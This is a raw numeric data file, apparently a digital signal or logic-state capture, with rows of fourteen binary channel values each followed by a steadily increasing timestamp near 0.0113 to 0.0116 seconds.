0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350860e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350884e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350908e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350932e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350956e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350980e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351008e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351032e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351060e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351084e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351108e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351132e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351156e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351180e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351208e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351232e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351260e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351284e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351308e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351332e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351356e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351380e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351408e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351440e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351468e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351492e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1351516e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1351540e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1475988e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1476200e-02 1,1,1,0,0,0,0,0,0,0,0,1,0,1,1.1476228e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1476252e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.1476556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1476584e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.1476608e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1476636e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.1476660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1476684e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.1476708e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1476732e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.1476756e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1476784e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,1,1.1476788e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1476824e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1476836e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1476860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1476868e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1476884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1476908e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1476932e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1476956e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1476984e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477008e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477036e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477060e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477084e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477108e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477156e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1477164e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1477208e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1477236e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1477240e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477244e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477284e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1477288e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1477332e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1477356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477364e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477384e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477408e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477436e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477460e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477584e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477608e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477636e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477660e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477732e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477756e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477784e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477808e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477836e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477860e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1477884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477908e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1477912e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1477956e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1477984e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1477988e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1477992e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478008e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478036e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478184e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478208e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478236e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478332e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478384e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478408e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1478436e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1478484e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1478508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478516e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478584e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478608e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478636e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,1.1478660e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1478664e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1478708e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1478732e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478740e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478756e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478784e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1478788e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1478836e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1478860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478868e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1478932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1478984e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479008e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479084e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1479088e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1479136e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1479156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479168e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479208e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479236e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479336e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1479340e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1479356e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1479384e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1479412e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1479436e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479444e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479564e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479584e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479612e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479636e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479684e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479708e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479736e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479760e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479788e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479836e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479884e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479936e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1479960e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1479988e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480012e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480036e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1480040e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1480084e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1480108e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1480112e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480116e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480156e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480204e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480228e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480256e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480280e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1480308e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1480356e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1480380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480388e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480404e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480428e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480456e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480480e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480580e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,1.1480584e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1480588e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1480632e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1480656e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1480660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480664e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480680e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480800e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480824e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480884e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480904e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1480924e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1480984e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481004e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481052e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481060e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1481096e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481116e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481128e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481140e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481188e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481208e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481232e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1481260e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481288e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1481332e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481364e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481392e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481412e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481436e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481460e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481480e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481504e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481524e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481548e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481572e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481580e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1481616e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481636e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481648e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481660e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1481692e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481708e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1481748e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481772e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1481796e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481820e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1481844e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1481864e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1481872e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481876e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1481976e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1481996e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482020e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482044e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482068e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482088e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482116e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482140e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482188e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482212e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482236e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482264e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482288e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1482316e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1482364e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1482388e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482396e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482412e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482436e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1482444e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1482488e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1482516e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1482520e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482524e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482540e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482588e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482612e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482636e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482664e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482688e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1482716e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1482764e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1482788e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482796e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482836e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482864e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482888e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482916e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482940e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1482964e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1482988e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483012e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483036e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483140e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483164e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483188e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483220e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483244e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483268e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483296e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483320e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483348e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483372e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483396e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483420e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483448e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483476e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483500e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483604e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1483628e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1483660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1607892e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.1608092e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1608116e-02 0,0,0,1,0,0,0,0,0,0,0,1,0,1,1.1608140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1608172e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1608484e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1608508e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1608536e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1608564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1608588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1608612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1608636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1608660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1608688e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,1.1608716e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1608724e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1608764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1608788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1608796e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1608812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1608836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1608892e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1608916e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1608940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1608964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1608988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609064e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609088e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1609116e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1609164e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1609188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609196e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1609244e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1609292e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1609316e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.1609320e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609324e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609464e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609516e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609588e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609636e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609692e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609716e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609864e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1609888e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1609916e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1609964e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1609988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1609996e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610064e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610116e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610212e-02 